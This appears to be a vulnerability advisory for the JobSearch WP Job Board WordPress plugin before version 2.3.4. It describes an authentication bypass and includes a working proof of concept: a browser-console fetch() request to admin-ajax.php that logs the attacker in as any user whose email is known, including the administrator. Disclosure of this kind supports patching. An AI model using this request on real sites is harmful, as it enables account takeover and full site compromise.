JobSearch WP Job Board < 2.3.4 - Authentication Bypass

Description The plugin does not prevent attackers from logging-in as any users with the only knowledge of that user’s email address.

PoC

Browse to the site, paste the following in your browser’s console (replace the email address with that site’s administrator’s email address): fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: { ‘Content-Type’: ‘application/x-www-form-urlencoded’, }, body: new URLSearchParams({ ‘action’: ‘jobsearch_facebook_get_soc_login_url’, ‘user_data’: JSON.stringify({ “id”: Math.random()*1000, “email”: “[email protected]”, }) }) }) .then(response => response.text()) .then(data => console.log(data)) .catch(error => console.error(‘Error:’, error)); Then access /wp-admin, and notice you’re logged-in as an admin.